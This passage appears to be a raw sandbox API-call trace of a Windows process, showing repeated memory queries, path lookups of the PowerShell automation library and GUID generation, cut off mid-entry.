[0062.651] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.651] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.652] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.652] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.652] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.652] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.653] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.653] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.653] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.653] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.654] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.654] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb7c0731, Data2=0xe9aa, Data3=0x4446, Data4=([0]=0xbf, [1]=0x1e, [2]=0x2, [3]=0x9e, [4]=0xc8, [5]=0xc9, [6]=0x18, [7]=0xb6))) returned 0x0 [0062.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.657] VirtualQuery (in: lpAddress=0x24b500, lpBuffer=0x24c3c0, dwLength=0x30 | out: lpBuffer=0x24c3c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.657] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.658] VirtualQuery (in: lpAddress=0x24b7b0, lpBuffer=0x24c670, dwLength=0x30 | out: lpBuffer=0x24c670*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7c708ccd, Data2=0xcd41, Data3=0x468b, Data4=([0]=0x8b, [1]=0x8f, [2]=0x9e, [3]=0x66, [4]=0x15, [5]=0x4d, [6]=0x7, [7]=0x74))) returned 0x0 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x526af478, Data2=0x75a3, Data3=0x45c3, Data4=([0]=0x93, [1]=0x61, [2]=0x3d, [3]=0xb9, [4]=0x70, [5]=0x6e, [6]=0xb, [7]=0x32))) returned 0x0 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xad84c10b, Data2=0x5f5b, Data3=0x4b8a, Data4=([0]=0x86, [1]=0x7d, [2]=0xc8, [3]=0x5a, [4]=0x79, [5]=0x7c, [6]=0x89, [7]=0x24))) returned 0x0 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.662] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x19faf4e5, Data2=0xa951, 